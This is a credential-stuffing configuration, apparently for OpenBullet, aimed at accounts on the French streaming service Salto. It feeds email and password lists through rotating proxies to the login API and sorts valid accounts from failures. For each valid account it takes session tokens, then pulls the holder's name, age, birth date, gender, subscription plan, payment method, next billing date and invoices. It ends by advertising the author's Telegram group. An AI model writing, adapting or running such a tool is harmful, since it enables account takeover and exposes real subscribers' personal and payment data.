[SETTINGS]
{
  "Name": "SALTO.FR (STREAMING)",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-08T23:14:13.3146422+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://login.salto.fr/accounts.login" 
  CONTENT "loginID=<USER>&password=<PASS>&sessionExpiration=-2&targetEnv=jssdk&include=profile%2Cdata&includeUserInfo=true&lang=fr&APIKey=3_nHh1rdsQ9v8WTUvRNFtOJS1v5nPAl6nqTxbzMsVCckVqD5QN7HsXRu_FKqUp5kjw&sdk=js_latest&authMode=cookie&pageURL=https%3A%2F%2Fwww.salto.fr%2Fconnexion&sdkBuild=12208&format=json" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.salto.fr" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Origin: https://www.salto.fr" 
  HEADER "Referer: https://www.salto.fr/" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid loginID or password" 
    KEY "Invalid LoginID" 
    KEY "403042" 
  KEYCHAIN Success OR 
    KEY "\"login_token\": \"" 
    KEY "\"isLoggedIn\": true" 

#Token PARSE "<SOURCE>" LR "\"login_token\": \"" "\"" -> VAR "Token" 

#UID PARSE "<SOURCE>" LR "\"UID\": \"" "\"" -> VAR "UID" 

#UIDSig PARSE "<SOURCE>" LR "\"UIDSig\": \"" "\"" -> VAR "UIDSig" 

#UIDSignature PARSE "<SOURCE>" LR "\"UIDSignature\": \"" "\"" -> VAR "UidSig" 

#SigTime PARSE "<SOURCE>" LR "\"signatureTimestamp\": \"" "\"" -> VAR "SigTime" 

#CUT FUNCTION CurrentUnixTime "<SigTime>" -> VAR "CUT" 

#firstName PARSE "<SOURCE>" LR "\"firstName\": \"" " \"" CreateEmpty=FALSE -> CAP "firstName" 

#age PARSE "<SOURCE>" JSON "age" CreateEmpty=FALSE -> CAP "age" 

#birthDay PARSE "<SOURCE>" JSON "birthDay" CreateEmpty=FALSE -> CAP "birthDay" 

#birthMonth PARSE "<SOURCE>" JSON "birthMonth" CreateEmpty=FALSE -> CAP "birthMonth" 

#birthYear PARSE "<SOURCE>" JSON "birthYear" CreateEmpty=FALSE -> CAP "birthYear" 

#gender PARSE "<SOURCE>" JSON "gender" CreateEmpty=FALSE -> CAP "gender" 

#Date_Joined PARSE "<SOURCE>" LR "\"registered\": \"" "T" CreateEmpty=FALSE -> CAP "Date Joined" 

#Registered_from PARSE "<SOURCE>" LR "\"registration_source\": \"" "\"" CreateEmpty=FALSE -> CAP "Registered from" 

REQUEST GET "https://front-auth.salto.fr/v2/platforms/m6group_web/getJwt" 
  
  HEADER "Host: front-auth.salto.fr" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: https://www.salto.fr/" 
  HEADER "X-Customer-Name: salto" 
  HEADER "X-Client-Release: 5.12.8" 
  HEADER "x-auth-device-id: _luid_ee48c37a-7ddb-44b4-8585-b9cf26cc44a2" 
  HEADER "X-Auth-gigya-uid: <UID>" 
  HEADER "X-Auth-gigya-signature: <UidSig>" 
  HEADER "X-Auth-gigya-signature-timestamp: <CUT>" 
  HEADER "Origin: https://www.salto.fr" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept-Encoding: gzip, deflate" 

#TOK1 PARSE "<SOURCE>" LR "{\"token\":\"" "\"}" -> VAR "TOK1" 

#GET_SUBSCRIPTION REQUEST GET "https://stores.salto.fr/premium/v1/customers/salto/platforms/m6group_web/users/<UID>/subscriptions" 
  
  HEADER "Host: stores.salto.fr" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "X-Customer-Name: salto" 
  HEADER "X-Client-Release: 5.12.8" 
  HEADER "Origin: https://www.salto.fr" 
  HEADER "Authorization: Bearer <TOK1>" 
  HEADER "Referer: https://www.salto.fr/" 
  HEADER "Connection: keep-alive" 

#Plan_Name PARSE "<SOURCE>" LR "\"title\":\"" "\"" CreateEmpty=FALSE -> CAP "Plan Name" 

#Plan_Type PARSE "<SOURCE>" LR "\"caption\":\"" "\"}}" CreateEmpty=FALSE -> CAP "Plan Type" 

#User PARSE "<SOURCE>" LR "\"features\":[{\"code\":\"" "\"}]" CreateEmpty=FALSE -> CAP "How many User" 

#PMVia PARSE "<SOURCE>" LR "\"payment_method\":{\"type\":\"" "\"" CreateEmpty=FALSE -> CAP "Payment Method via" 

#Auto_renewal PARSE "<SOURCE>" LR "\"recurring\":" "," CreateEmpty=FALSE -> CAP "Auto renewal" 

#Plan_Price PARSE "<SOURCE>" LR "\"recurring_price\":" "," CreateEmpty=FALSE -> CAP "Plan Price" "" "€" 

#Free_trial PARSE "<SOURCE>" LR "\"free_trial\":" "," CreateEmpty=FALSE -> CAP "Free trial" 

#Due PARSE "<SOURCE>" LR "\"due_date\":" "," -> VAR "Due" 

#Next_Billing FUNCTION UnixTimeToISO8601 "<Due>" -> CAP "Next Billing" 

#GET_Invoice REQUEST GET "https://stores.salto.fr/premium/v1/customers/salto/platforms/m6group_web/users/<UID>/invoices" 
  
  HEADER "Host: stores.salto.fr" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "X-Customer-Name: salto" 
  HEADER "X-Client-Release: 5.12.8" 
  HEADER "Origin: https://www.salto.fr" 
  HEADER "Authorization: Bearer <TOK1>" 
  HEADER "Referer: https://www.salto.fr/" 
  HEADER "Connection: keep-alive" 

#User_Invoice PARSE "<SOURCE>" LR "[" "]" -> VAR "User Invoice" 

#AUTHOR FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By " 

#Join_Us_--> FUNCTION Constant "https://t.me/OfficialYashvirGamingConfigsGroupChat" -> CAP "Join Us --> " 

